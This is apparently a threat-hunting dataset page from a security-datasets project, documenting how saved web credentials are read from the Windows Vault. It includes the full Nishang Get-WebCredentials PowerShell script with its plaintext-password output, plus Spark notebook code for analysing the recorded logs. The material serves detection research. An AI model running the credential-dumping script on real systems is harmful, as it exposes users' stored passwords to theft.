# Windows Vault Web Credentials

## Metadata


|                   |    |
|:------------------|:---|
| Author            | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date     | 2020/10/28 |
| Modification Date | 2020/10/28 |
| Tactics           | ['[TA0004](https://attack.mitre.org/tactics/TA0004)', '[TA0005](https://attack.mitre.org/tactics/TA0005)'] |
| Techniques        | ['[T1055](https://attack.mitre.org/techniques/T1055)'] |
| Tags              | None |

## Dataset Description
This dataset represents threat actors accessing the Windows Vault and reading web credentials saved.

## Datasets Downloads


| Dataset Type | Link   |
|:-------------|:-------|
| Host | [https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/small/windows/credential_access/host/psh_windows_vault_web_credentials.zip](https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/small/windows/credential_access/host/psh_windows_vault_web_credentials.zip) |

## Notebooks
Notebooks created by the community leveraging the mordor datasets


| Author | Name | Link |
|:-------|:-----|:-----|

## Simulation Plan


| Environment | Tool Type | Module |
|:------------|:----------|:-------|
| Lab VM | Manual | [PowerShell](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1) |

## Adversary View
```
Add Web Credentials
-------------------
PS > $pv = New-Object Windows.Security.Credentials.PasswordVault
PS > $pw = New-Object Windows.Security.Credentials.PasswordCredential('http://ossemproject.com', 'pgustavo', 'Pass@Word')
PS >$pv.Add($pw)

Import Get-WebCredentials
-------------------------
function Get-WebCredentials
{
  <#
  .SYNOPSIS
  Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above)
  .DESCRIPTION
  This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script 
  also needs PowerShell v3 onwards and must be run from an elevated shell.
  .EXAMPLE
  PS > Get-WebCredentials
  .LINK
  https://github.com/samratashok/nishang
  #>
  [CmdletBinding()] Param ()
  
  
  #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage
  $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
  $VaultObj = new-object Windows.Security.Credentials.PasswordVault
  $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }
}

Run Get-WebCredentials
----------------------
PS C:\Users\wardog> Get-WebCredentials

UserName Resource                Password  Properties
-------- --------                --------  ----------
pgustavo http://ossemproject.com Pass@Word {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], ...


PS C:\Users\wardog>
```

## Explore Mordor Dataset

### Initialize Analytics Engine

In [ ]:
from openhunt.mordorutils import *
spark = get_spark()

### Download & Process Mordor File

In [ ]:
mordor_file = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/small/windows/credential_access/host/psh_windows_vault_web_credentials.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

### Get to know your data

In [ ]:
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)